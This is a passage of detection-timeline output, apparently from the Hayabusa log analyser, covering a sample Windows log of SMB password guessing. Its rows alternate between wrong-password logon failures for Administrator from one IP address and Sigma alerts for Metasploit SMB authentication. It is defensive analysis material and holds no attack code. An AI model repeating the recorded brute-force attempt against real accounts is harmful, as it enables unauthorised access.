Password,User: Administrator : Type: 3 : Workstation: WtHsItpyFHQxvLWm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.251 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.287 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RdGMqIhUGHj23Xm2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.287 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BfE5LVmrPaAFLwBR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b1swKSla5gkdOwxH : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.368 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kL9MdVnRVogiP7hF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.408 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aQ0hRdwZvC5PBcXl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.456 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ctbv73J0Dot9raD0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.497 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wKpWApJIKkjbtaPB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.590 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kVTAv9VoNpUyxQFM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.590 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.642 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xb3t1dpuk9JZri5p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.642 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: fy0UrW8TWrxAOX90 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iUXUbUsiE6Ahh9iD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2QQdQ6rQYLBf15AF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.820 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zG4eJLuQ4u2dKQG0 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.820 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.854 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QCfwHs2gVGiRc3Fy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.854 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 67TcwQfTxgTtQvCU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.897 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: imnSPKAKYzrCKSUf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mMNbdjiXNUY0gTfB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.024 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zOAH0gjfs8JcXSMO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.068 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TnnB4KPBiDvKMsUL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.117 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 0aZRgpa5riqIEWhQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.153 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.198 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BBL4nrs7f6cjlfsT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.198 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.247 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fgDupzqipe5jK0r5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.247 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5yPcTOWPuN8efJtl : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.280 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dszb6s0w6glvSkSw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.320 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ynu936pVVAuDUGT5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.407 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c55o3Dca2tiUVwb2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.407 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tnDmp2KK02LyJ7Xm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.444 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xRUKrHDAmgEPcjQw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.499 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PCGKDvPhzg6BlsuU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.548 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.594 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: OU28biGLJkFmB117 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.594 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 029LphuWcoo9S2hL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.628 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ItIROqP2wyzLJa9s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.670 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XngGun3HYopTkcrA : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c91Qz5QNUczcm7m6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.749 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t7nyWJJJhDiqnf1d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.784 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bnj7hAp20gZE9FCe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.828 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FydQjBxO7XninU5Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.869 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3P8InIzyD86BXr1d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.901 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wvKGa3A3qw7s0cZX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: QTY7tRVEMjXZXFyH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:50.993 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m4Ij1NSYGYbq4PxS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 47fOxZAYhjxLzEoU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aGxXaNNChVScbHe6 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.124 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jTcVeB8f2Rs3Bldo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.161 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yeSnUlIbuDVNffey : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.201 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eXIM4tWru1x0AahJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:51.308 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
